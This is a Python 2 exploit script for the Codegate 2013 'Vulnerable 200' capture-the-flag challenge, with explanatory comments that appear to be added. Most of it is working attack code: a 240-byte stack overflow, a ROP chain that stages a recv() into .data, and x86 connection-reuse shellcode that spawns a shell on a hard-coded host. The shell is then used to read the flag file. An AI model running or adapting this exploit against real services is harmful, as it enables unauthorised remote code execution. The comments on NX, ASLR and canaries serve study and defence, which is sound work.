Codegate 2013 Vulnerable 200 exploit code
"""
$python vuln200.py
[+] send pwning payload (Stage 1)
[+] Execute Shell (Stage 2)
uid=1001(codegate2013) gid=1001(codegate2013) groups=1001(codegate2013)
"""
import socket,time
from struct import pack
# Challenge endpoint: a fixed IPv4 literal, plain TCP. This is Python 2 code
# (print statements below), so ``str`` payloads go on the wire as raw bytes.
host = "58.229.122.19"
port = 7777
sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sk.connect((host, port))
# Drain the service's initial menu so the socket sits at the command prompt
# before the first "write" is issued.
_menu = sk.recv(10240)
def do_write(msg):
    """Issue one ``write`` command carrying *msg* and drain the service's reply.

    Uses the module-level socket ``sk``. The command keyword and *msg* are sent
    back to back with no separator (the protocol as used by this script), then
    two recv() calls consume whatever the service echoes so the connection is
    quiet before the next stage. Return values of recv() are discarded.
    """
    sk.send("write" + msg + "\n")
    for _ in range(2):  # two reply chunks are expected after each write
        sk.recv(10240)
# x86-32 Linux shellcode. Reading the bytes, it is the usual "reuse the
# connection" stub: dup2() the client socket (fd 4 -- the same descriptor the
# ROP chain below hands to recv()) over stdin/stdout/stderr, then execve a
# /bin//sh. That is why plain shell commands written to ``sk`` afterwards are
# answered on the same connection.
shellcode = "\x31\xc0\x31\xdb\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xb3\x04\xcd\x80\x75\xf6\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80"
# Stage 1 chain (author's note: "do rop with recv() and use .data for paste
# shellcode"). Read as the stack frame it overwrites:
#   0x08048780  call target, presumably recv's PLT entry -- confirm against the binary
#   0x0804b07c  return address after recv(): .data itself, so execution falls
#               straight into the bytes just received
#   4, 0x0804b07c, 0x1000, 0  -> recv(fd=4, buf=.data, len=0x1000, flags=0)
# Defensive takeaway: the chain needs .data to be executable (NX defeats the
# return into it) and fixed non-PIE addresses (ASLR/PIE defeats the chain); a
# stack canary would catch the overwrite before the return address is used.
rop = pack("I",0x08048780)
rop += pack("I",0x0804b07c)
rop += pack("I",4)
rop += pack("I",0x0804b07c)
rop += pack("I",0x1000)
rop += pack("I",0)
# 240 bytes of filler followed by the chain. The offset is the original
# author's; presumably it spans the vulnerable buffer up to the saved return
# address of the "write" handler, but that cannot be verified from this script.
payload = "A"*240+rop
print "[+] send pwning payload (Stage 1)"
do_write(payload)
# Stage 2: the recv() staged by the chain reads this line into .data and the
# planted return address transfers control to it.
print "[+] Execute Shell (Stage 2)"
sk.send(shellcode+"\n")
# From here the socket is attached to the spawned shell: each send is a shell
# command, each recv its output (best effort -- a single 10240-byte read per
# command, so long output may be truncated or split across reads).
sk.send("id\n")
print sk.recv(10240)
sk.send("ls -la\n")
print sk.recv(10240)
sk.send("cat key\n")
print sk.recv(10240)
sk.send("cat Pwned.txt\n")
print sk.recv(10240)